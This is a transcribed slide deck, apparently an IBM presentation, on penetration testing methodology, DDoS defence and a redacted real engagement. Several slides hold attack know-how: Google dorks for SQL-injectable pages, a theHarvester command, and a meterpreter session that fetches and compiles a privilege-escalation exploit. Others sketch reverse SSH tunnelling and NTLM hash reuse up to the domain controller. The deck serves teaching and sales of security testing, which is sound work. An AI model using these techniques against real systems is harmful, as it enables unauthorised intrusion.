Ethical Hacking and Pentesting

Transcription

1 Ethical Hacking and Pentesting Vito Rallo, IBM Security Services Penetration Testing Have a Smartphone? SCAN ME

2 Hackers and Ethical Hackers The hacker manifesto: Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.

3 Having fun in Security Ethical hackers enjoy the most exciting part of Security? Network Security Application Security TESTING Data Security Cloud Security Mobile Security Compliancy Availability Management

4 Penetration testing through the years early pentesting was a black art true penetration testing skills were learned there was no semblance of a commonly-accepted methodology, every pentester used to write his own In late 2000 open source security testing methodology the OSSTMM Pentest widespread, tools and knowledge IBM has done pentest since 1995

5 Outline of activities The IBM penetration testing methodology includes: Project initiation Reconnaissance Discovery and assessment Perimeter or internal attack Exploitation Findings and analysis Deliverables (report)

6 Today: the new pentesting It s crucial understanding the process of an attack, not just the tools and the vulns but the actual mindset to use to break in Pentest is not a project, it s a PROCESS! There is plenty of companies who will teach you ethical hacking, applied pentesting, books, tools and so on. None of them will give you the hacking mindset. A good pentesting is made by PEOPLE not by TOOLS

7 Client Values and Deliverables Penetration testing services can deliver: An effective, affordable service that provides a hacker s-eye view of a client s security posture

8 What IBM can deliver Penetration testing Coporate networks and local infrastructures (remote/onsite) WebApplications (blackbox/ graybox) Mobile and Embedded device testing (e.g. iphone, Android) SCADA control systems for utility and power companies Client Server Apps and Mobile apps Reverse engineering and exploit development Application and Mobile Security Assessment Functional review of the application from both a client and server perspective Comprehensive vulnerability assessment of the application and network infrastructure directly supporting the application Mobile Applications Assessment Application Source Code Assessment In-depth assessment of vulnerabilities only found through source code analysis Map with regulations such as PCI, DISA, FISMA, and Sarbanes-Oxley, and best practices including the OWASP Top 10 Leverages IBM Rational Leverages IBM Rational AppScan software AppScan Source Edition Assessment of application vulnerabilities

9 DoS attacks categories Network (L4 attacks) TCP/UDP/ICMP Floods Protocol Specific Weaknesses Application (L7 attacks) HTTP Slow Loris, R.U.D.Y, etc SSL DNS

10 DDoS Defence Strategy Many providers/services à cloud service Scrub Services (clean pipe) MSS and Carrier Cloud Netflow Mostly based on: Anomalies Analysis/Signature based detection Common patterns: In-premises mitigations, Outpremises mitigation Pain points: decentralization of the internet Ideally, block attacks closest the source

11 New generation remediation trends Overlay Networks Large distributed nodes, reverse proxies, bleeding edge known mitigation services (AKAMAI)

12 Let s get into the business Pentest in real life 12

13 Reconnaissance DNS Domain IP à who is Social Networks Corporate info and so on Jobs ads..!? K./theHarvester.py -d xxx.be -l 500 -b google [-] Searching in Google: Searching 500 results... [+] s found: LOT MORE [+] Hosts found in search engines: xx x: 1xx.244.x.200:ns.xxx.be 1xx.x :Ns.xxx.be x :ns2.xxx.be [-] Searching in Linkedin.. Users from Linkedin: ==================== Nico xxxff Nishantxxxxar - Singapore Systems analyst web Fraxx xxxens - Belgium Lucxxx xxxans Systems technology analyst xxx xxxeters Nishant xxxxxxr

14 Reconnaissance Google hacking.. and Dorks inurl:"id=" & intext:"warning: mysql_fetch_assoc() inurl:"id=" & intext:"warning: mysql_fetch_array() inurl:":2082/login/?user=" inurl:free.fr/index.php?id= inurl:reservation.php?id= inurl:promotion.php?id= inurl:carte.php?id= inurl:menu.php?id=

15 Shodan Google for hackers Search engine of indexed banners

16 Tons and tons of open devices

17 Vulnerability Discovery Latest 5 years tendency

18 Keys issues in WebApp security SQL Injection A definition: SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application (like queries). The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. Cross Site Scripting A definition: Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables attackers to inject client-side script into web pages viewed by other users.

19 SQL injection in Login

20 Cross-Site Scripting The Exploit Process IBM Confidential

21 XSS, BeEF Basically a client-exploitation Framework

22 Establish a toehold The beginning of the end Compromise a server: force the webapp to upload a malicious file à how? Password discovered, phpinclude, phpupload, exploiting CMS vulns and so on Now, think about privilege escalation up to root!

23 French company, call it Carla Owns several brands Offer Intranet services Hosts website in internal DMZ Black Box Pure offensive hacking, no whitelisting, event monitoring team 84.x.x.x one2one NAT/PAT 84.x.x.y 84.x.x.z servers (web, ftp) DMZ x extranet.gammvert.fr

24 Carla Critical vuln Acajoom, plug in for Joomla (pass to exec) )

25 Privileges Escalation Linux environment analysis (uname a) cat /etc/redhat-release Red Hat Enterprise Linux Server release 5.3 (Tikanga) meterpreter > sysinfo Computer : XXXXwebServer OS : Linux XXXXwebServer el5 #1 SMP Wed Dec 17 11:42:39 EST 2008 i686 Meterpreter : php/php cd /tmp wget gcc c -o nu./nu

26 The final attack scenario attacking server TUNNELL SSH Reverse SSH Server Infrastructure (Windows and Linux hosts) Control+ Socks vpn vuln direct exploitation biotop webserver invivo DMZ x Hacker, attacking station

27 Inside the DMZ We can now connect TCP to all the inner hosts on the private LAN, scan, discovery, exploit again Touching services that are not available from outside the Firewall (firewall cannot catch me).

28 Windows Domain Escalation Just a old unused server Get in, compromise one Get NTLM hash for Admin, try on other server.. Administrators tends to use the same password for local admin accounts Get another one, search for tokens Service in execution with Domain Admin rights Escalation to the domain controller!

29 The new Unawareness Next years fun 29

30 Awareness and unawareness Web App 5 years ago HTTP Based, GET, POST requests Web App Today HTML, CSS, Dynamic, AJAX, RoR still some Flash, Java, Silverlight Web App in 2 years

31 Web Apps in 2 years

32 Mobile Threat Model Slide from OWASP

33 STRIDE Model for Mobile Slide from OWASP

34 Testing Framework for apps and devices Dynamic Analysis Static Analysis

35 Final Considerations Security posture of your enterprise 35

36 Compliance is not total security Scan, Checklists, Security Products.. Will offer you total bullet-proof security solution?

37 The right attitude Confused, Uncertainty, Fear, Unprepared, Proud, Unclear

38 Certainty

39 Uncertainty Create Security Intelligence Iterate Prevention->Monitor->Response to dynamically improve the security model

40 Emergency Response Helps the customer under emergency contingency: Analysis of computer security incident data to determine the source of the incident, its cause, and its effects; Assist in preventing the effects of the computer security incident from spreading to other computer systems and networks; Assist with stopping the computer security incident at its source and/or protecting Customer s computer systems and networks from the effects of the computer security incident; Recommendations for restoration of the affected computer systems and networks to normal operations; and Suggesting protection methods for Customer s computer systems and networks from future similar occurrences Incidents Response; Containment and Remediation (Forensic analysis), Prevention Who they are: high skilled security people, forensics experts, certified analysts and ex-military

41 Questions Vito